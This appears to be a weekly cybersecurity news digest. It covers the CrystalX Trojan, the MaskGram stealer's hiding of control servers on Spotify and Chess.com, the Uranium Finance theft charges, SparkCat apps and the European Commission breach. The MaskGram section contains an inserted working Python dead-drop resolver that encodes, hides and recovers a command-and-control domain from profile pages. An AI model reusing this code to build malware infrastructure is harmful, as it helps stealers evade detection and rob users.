We’ve compiled the most important cybersecurity news from the past week.
- A prank Trojan has been discovered in Russia that spies on victims, swaps crypto wallet addresses, and mocks users.
- Server addresses for cryptocurrency theft software were found on Spotify and Chess.com.
- A hacker has been charged with stealing $53 million from the Uranium cryptocurrency exchange.
- Experts have identified an updated stealer for seed phrases targeting Apple and Android devices.
A Prank Trojan Discovered in Russia
Kaspersky Lab experts identified an active campaign in Russia promoting a new Trojan called CrystalX. It is sold under a CaaS model and advertised through social media channels such as Telegram and YouTube.
The software functions as both a spy and a stealer, enabling the following actions:
- stealing browser credentials and accounts from Steam, Discord, and Telegram;
- silently replacing cryptocurrency wallet addresses in the clipboard;
- secretly recording audio and video from the screen and webcam.
A distinctive feature of the malware is its real-time mockery of users. The control panel includes a dedicated Rofl section with commands such as:
- downloading an image from a specified URL and setting it as the desktop background;
- rotating the screen orientation by 90°, 180°, or 270°;
- shutting down the operating system using the shutdown.exe utility;
- swapping the left and right mouse button functions;
- turning off the monitor and blocking input;
- shaking the cursor at short intervals;
- hiding all file icons on the desktop, disabling the taskbar, task manager, and cmd.exe.
Additionally, the attacker can send a message to the victim, which opens a dialog box for two-way communication.
Source: Kaspersky Lab.
As noted by senior Kaspersky GReAT expert Leonid Bezvershenko in a comment to "Kod Durova," the malware is actively evolving and is supported by its creators. He expects the number of victims to grow as the geography of the attacks expands.
Experts recommend downloading applications only from official stores, installing reliable antivirus software, and turning on the display of file extensions in Windows so that dangerous .EXE, .VBS, and .SCR files are not launched by accident.
Server Addresses for Cryptocurrency Theft Software Found on Spotify and Chess.com
Researchers from Solar 4RAYS have noted that hackers are hiding the addresses of the MaskGram stealer's control servers in user profiles on Spotify and Chess.com.
MaskGram aims to steal accounts and cryptocurrencies and can load additional modules.
The malware collects data about the system, process list, and installed applications, and takes screenshots. It extracts information from Chromium browsers, cryptocurrency wallets, email clients, messengers, and VPN applications.
Cybercriminals distribute the software through social engineering, disguising it as cracked versions of paid tools for mass checking of logins and passwords against leaked databases, such as Netflix Hunter Combo Tool, Steam Combo Extractor, and Deezer Checker.
According to the experts, the software uses the "dead drop" technique, also known as a Dead Drop Resolver (DDR): the control server information is stored on pages of public services, so the operators can change it quickly without pushing out a new build of the malware.
As a result, the infected machine connects not to a suspicious IP address but to Spotify or Chess.com, which looks like normal user activity.
A specific set of markers is used for each platform; for Chess.com, for example, it is the about field of the user profile. The string extracted between the markers is decoded and transformed into the server domain.
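The following toy resolver, added here as an illustration and not taken from MaskGram or the Solar 4RAYS report, shows the mechanics described above: the implant fetches an ordinary profile page, cuts out a platform-specific field using a pair of markers, decodes a blob hidden inside it, and validates the result as a hostname. The profile pages, the marker strings, the bracket delimiters, and the encoding (base64 over a reversed, XOR-obfuscated string) are all assumptions for this example; the real markers and encoding are not described on the page.

```python
"""Toy Dead Drop Resolver (DDR). Constructed example; not MaskGram's real scheme."""
import base64
import binascii
import re
from typing import Dict, Optional, Tuple

XOR_KEY = 0x5A  # assumed single-byte obfuscation key for this toy

# Platform -> (opening marker, closing marker) around the profile field that
# carries the payload. The chess.com "about" field is the one mentioned in the
# report; the Spotify field name is an assumption.
PLATFORM_MARKERS: Dict[str, Tuple[str, str]] = {
    "chess.com": ('<div class="about">', "</div>"),
    "spotify": ('"biography":"', '"'),
}
PAYLOAD_RE = re.compile(r"\[\[([A-Za-z0-9+/=]+)\]\]")  # assumed [[...]] delimiters
HOSTNAME_RE = re.compile(r"[a-z0-9.-]+\.[a-z]{2,}")


def encode_c2(domain: str) -> str:
    """Operator side: reverse the domain, XOR each byte, then base64 it so it
    survives as innocuous-looking profile text."""
    obf = bytes(b ^ XOR_KEY for b in domain.encode("ascii")[::-1])
    return base64.b64encode(obf).decode("ascii")


def decode_c2(blob: str) -> Optional[str]:
    """Implant side: undo encode_c2. Returns None on anything that is not a
    clean payload rather than crashing on a noisy profile."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return bytes(b ^ XOR_KEY for b in raw)[::-1].decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def resolve_c2(platform: str, page: str) -> Optional[str]:
    """Locate the platform-specific field, pull the [[...]] blob out of it,
    decode it and accept it only if it looks like a hostname."""
    start, end = PLATFORM_MARKERS[platform]
    field = re.search(re.escape(start) + r"(.*?)" + re.escape(end), page, re.S)
    if not field:
        return None
    blob = PAYLOAD_RE.search(field.group(1))
    if not blob:
        return None
    domain = decode_c2(blob.group(1))
    return domain if domain and HOSTNAME_RE.fullmatch(domain) else None


def resolve_any(pages: Dict[str, str]) -> Optional[str]:
    """Try each dead drop in turn; the first one yielding a valid domain wins.
    Several drops give the operator redundancy if one profile is taken down."""
    for platform, page in pages.items():
        domain = resolve_c2(platform, page)
        if domain:
            return domain
    return None


# Constructed profile pages (not real captures). The chess.com profile has been
# "rotated" to a new domain: the operator edited one field and every existing
# infection follows it on the next poll. The Spotify profile carries junk that
# fails validation, so the resolver falls through to the working drop.
SAMPLE_PAGES: Dict[str, str] = {
    "spotify": '{"name":"dj_x","biography":"just vibes [[not-base64!]]"}',
    "chess.com": (
        '<html><div class="about">Lifelong 1.e4 player '
        f'[[{encode_c2("c2-new.example.net")}]]</div></html>'
    ),
}

if __name__ == "__main__":
    print("resolved C2:", resolve_any(SAMPLE_PAGES))  # c2-new.example.net
```

The same resolver works in reverse for a defender: anyone holding cached copies of the profile pages an infected host fetched can run them through `resolve_c2` to recover the current control domain, and the validation step (reject anything that does not decode to a hostname) is exactly the kind of check that distinguishes a dead drop from ordinary noise in a profile field.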
In March, Aikido specialists documented the use of the dead drop technique by the GlassWorm stealer in cryptocurrency transactions on the Solana blockchain.
Hacker Charged with Stealing $53 Million from Uranium Exchange
The U.S. Attorney's Office charged Jonathan Spalletta with stealing over $53 million from the Uranium Finance cryptocurrency exchange and with money laundering.
In April 2021, Spalletta (known online as Cthulhon) hacked the decentralized exchange (DEX) Uranium on the BNB Chain. The loss of funds forced the project to shut down.
In February 2025, during a search of the suspect's home, law enforcement seized valuables and recovered access to cryptocurrency worth about $31 million.
According to law enforcement, Spalletta laundered the stolen assets through decentralized exchanges and the Tornado Cash mixer. He spent the proceeds on collectibles:
- a Magic: The Gathering card “Black Lotus” — ~$500,000;
- 18 sealed Alpha Edition Magic: The Gathering boosters — ~$1.5 million;
- a complete first edition Pokémon base set — ~$750,000;
- an ancient Roman coin minted to commemorate the assassination of Julius Caesar — over $601,000.
Spalletta faces up to 10 years in prison for computer fraud and up to 20 years if convicted of money laundering.
Experts Identify Updated Seed Phrase Stealer for Apple and Android
Kaspersky Lab researchers have discovered a new version of the SparkCat malware for stealing cryptocurrencies in the Apple App Store and Google Play Store. This was reported by The Hacker News.
The stealer disguises itself as harmless applications such as corporate messengers and food delivery services. In the background, it scans victims' photo galleries for images of cryptocurrency wallet seed phrases.
Experts analyzed two infected applications in the App Store and one in Google Play, primarily targeting cryptocurrency users in Asia:
- iOS version. It scans for English-language wallet mnemonic phrases, which makes it potentially more dangerous globally, since it can affect users regardless of their region;
- Android version. Compared with earlier versions, it adds several layers of code obfuscation, using code virtualization and cross-platform programming languages to hinder analysis. It searches for keywords in Japanese, Korean, and Chinese, confirming its focus on the Asian region.
Experts believe that a Chinese- or Russian-speaking operator is involved in the operation. According to recent data, the threat is actively evolving, and those behind it possess high technical skills.
European Commission Confirms Data Leak from ShinyHunters Cyberattack
The European Commission (EC) confirmed a data leak following a cyberattack on the Europa.eu web platform, for which the ShinyHunters extortion group claimed responsibility.
The EC stated that the incident did not disrupt the portal's operations and was contained.
While the Commission did not provide details, the attackers told BleepingComputer that they had stolen over 350 GB of information, including several databases. They did not say how they compromised the AWS accounts but provided screenshots showing access to some EC employees' accounts.
The group also published a post on its dark web leak site, claiming that over 90 GB of files had been stolen:
- mail server dumps;
- databases;
- confidential documents and contracts;
- other sensitive materials.
Also on ForkLog:
- The Solana project Drift Protocol lost $280 million.
- CertiK warned about the risks of cryptocurrency theft via OpenClaw.
What to Read This Weekend?
After reviewing data from research teams, corporate reports, and the current state of affairs, ForkLog explored how brain-computer interface technologies are developing.
